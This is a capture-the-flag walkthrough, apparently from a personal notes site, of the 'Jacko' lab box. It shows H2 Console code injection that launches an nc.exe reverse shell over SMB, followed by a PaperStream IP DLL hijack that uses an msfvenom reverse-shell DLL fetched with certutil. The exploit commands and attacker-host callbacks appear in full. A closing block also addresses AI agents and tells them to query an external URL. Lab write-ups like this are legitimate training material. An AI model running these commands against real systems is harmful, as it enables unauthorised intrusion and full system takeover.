# Jacko

<figure><img src="/files/5WoCuTJtTKQi9YlcTz5P" alt=""><figcaption></figcaption></figure>

### Nmap

```
sudo nmap 192.168.67.66 -p- -sS -sV        

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
7680/tcp open  pando-pub?
8082/tcp open  http          H2 database http console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

On port 8082 we have a login page for H2 Console. Connecting with the default inputted values allows login to the console.

<figure><img src="/files/e3Njsz5syKQMmWD4buXZ" alt=""><figcaption></figcaption></figure>

Once logged in we can see that we are running on H2 Console version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to code injection using Java.

{% embed url="<https://www.exploit-db.com/exploits/49384>" %}

The following snippet is the vulnerable code we need to run on the H2 Console:

<figure><img src="/files/JLjpo7pn20Dz7UhbrC1B" alt=""><figcaption></figcaption></figure>

The section of the code that executed commands on the target machine has been shown below. To achieve code execution I set up a SMB Server on my attacking machine with Impacket's SMBserver.py script and ensured `nc.exe` was in the specified SMB share.

`-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');`

First set up a SMB server:

```
python2 smbserver.py -smb2support Share /home/kali/
```

<figure><img src="/files/J51U4mbD26kBFxQf5z8g" alt=""><figcaption></figcaption></figure>

Then paste the code from exploit-db into the SQL statement section of the website and ensure the --evaluate script section has the command for calling `nc.exe` on the attacking machines SMB server.

<figure><img src="/files/F76U9yyrYbMx0qyBno4a" alt=""><figcaption></figcaption></figure>

When ready run the SQL statement and we should see authentication on `smbserver.py`

<figure><img src="/files/dGroM1OTsDg1lzAGqeQN" alt=""><figcaption></figcaption></figure>

And then shortly after catch a reverse shell on our `netcat` listener.

<figure><img src="/files/jC2C6tiUpE9IjmJ5a89W" alt=""><figcaption></figcaption></figure>

First we need to fix PATH on the target machine as shown below:

```
set PATH=%SystemRoot%\system32;%SystemRoot%;
```

<figure><img src="/files/ImcUCEONLDY7WKVPXcpR" alt=""><figcaption></figcaption></figure>

Looking through Program files (x86) we can see a directory called PAPERSTREAM IP. Looking for exploits on exploit-db takes us to the following:

{% embed url="<https://www.exploit-db.com/exploits/49382>" %}

The description for this exploit is shown below:

```
A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
for a writable location, copies the specified DLL to that location and then
triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
named pipe.

# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444 
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
```

We need to change the DLL name generated by `msfvenom` and the payload location. When I attempted to download exploit to c:\windows\temp my file was deleted instantly. Possibly by AV?

First I generated a `msfvenom` shell to the name of the DLL required which is UninOldIS.dll. `msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082`

Then changed the payload file variable to the users Desktop.

<figure><img src="/files/PIwVYyir9XmrZDHITkhd" alt=""><figcaption></figcaption></figure>

At this point move into the users Desktop then use `certutil` to download the files as when copying by SMB I could get the payload to trigger without issues.

```
certutil -urlcache -split -f http://192.168.49.67/exploit.ps1 exploit.ps1
certutil -urlcache -split -f http://192.168.49.67/UninOldIS.dll UninOldIS.dll
```

Start a `netcat` listener on the attacking machine to listen in on port 8082. Then execute the Powershell exploit.ps1 on the target machine.

`C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1`

<figure><img src="/files/bafLQng6RsGy4lW9RooE" alt=""><figcaption></figcaption></figure>

A short while later we should receive a shell as SYSTEM.

<figure><img src="/files/whB5IutOfjmeJJ4zjaU5" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://fg0x0.gitbook.io/fg0x0s-notes/offensive-security/pg-practice/get-to-work/jacko.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.